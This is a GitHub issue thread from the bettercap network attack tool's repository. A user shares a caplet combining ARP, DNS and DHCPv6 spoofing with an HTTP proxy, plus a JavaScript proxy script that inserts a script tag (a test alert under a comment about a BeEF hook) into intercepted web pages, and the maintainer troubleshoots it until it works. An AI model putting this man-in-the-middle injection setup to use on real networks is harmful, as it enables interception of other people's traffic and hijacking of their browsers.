bettercap / bettercap

The Swiss Army knife for 802.11, BLE, HID, CAN-bus, IPv4 and IPv6 networks reconnaissance and MITM attacks.
https://www.bettercap.org/

Bettercap + dns spoofer + injectjs #469

Closed pokevas closed 5 years ago

pokevas commented 5 years ago

Caplet code:

set dns.spoof.domains example.com
set dhcp6.spoof.domains example.com

dhcp6.spoof on
dns.spoof on

set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset}

# inject beef hook
set http.proxy.script beef-inject.js
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on

beef-inject.js code:

// Called once when bettercap loads the proxy script.
function onLoad() {
    log("BeefInject loaded.");
    log("targets: " + env['arp.spoof.targets']);
}

// Called for every HTTP response passing through http.proxy.
function onResponse(req, res) {
    // Only touch HTML documents; leave images, scripts, etc. untouched.
    if (res.ContentType.indexOf('text/html') == 0) {
        var body = res.ReadBody();
        // Insert the test script right before the closing </head> tag.
        if (body.indexOf('</head>') != -1) {
            res.Body = body.replace(
                '</head>',
                '<script type="text/javascript">alert(12345);</script></head>'
            );
        }
    }
}

Note: I am trying to intercept only HTTP sites, not HTTPS.

I set up the DNS server on a Windows 10 machine in the network adapter settings. When I try to open http://example.com (oh, did you know that this site exists and is working?) I see this error: screenshot_4

In the bettercap terminal I see: screenshot_3

But the website does not load. Where is the problem? I want the user to go through the fake DNS server (built into bettercap), be forwarded to the proxy module (same machine and IP address) and have the .js code injected. When I try to connect to the bettercap proxy server without the DNS server, everything is okay. But when it comes from a DNS request, it does not load :(

Is the problem in the config or maybe in the server?

Thanks.

evilsocket commented 5 years ago

It seems to be working correctly, it's just that there's no http server serving anything on port 80 for example.com, so you get an ERR_CONNECTION_REFUSED ... once you use dns.spoof, you also need to serve something from your IP.

Moreover, since you'll need to serve files yourself given you're hijacking DNS records, what's the point of using http.proxy to inject beef?

You might just want to try a simpler combination of arp.spoof and http.proxy as dns.spoof doesn't seem to be required in this case ...

pokevas commented 5 years ago

Perhaps you misunderstood me. I don't need to replace the site content, I need to add JS code to the content on the fly. Why won't dns.spoof be needed if I want to do this: the client connects to my DNS server (I set the fake DNS in the network adapter settings), the bettercap fake DNS server returns its own IP address, and when the user tries to reach the site content via the IP address of the bettercap server, bettercap injects the JS code into the content and returns the modified content to the user. For this I need DNS spoofing + the bettercap proxy with JS injection. Or am I wrong?

evilsocket commented 5 years ago

yes you are wrong, on several levels:

  1. if you use both arp.spoof and dns.spoof, you don't need to set the DNS server in the settings ... the fact you do makes me think you don't understand how spoofing works.
  2. if there's nothing on 10.0.0.6:80, you can't really expect the page to load.
  3. again, you don't need dns.spoof for what you're trying to achieve, just arp.spoof and http.proxy

pokevas commented 5 years ago

Thanks. Indeed, I was wrong on some basic concepts. I removed DNS spoofing, set up a few extra things, and it all worked.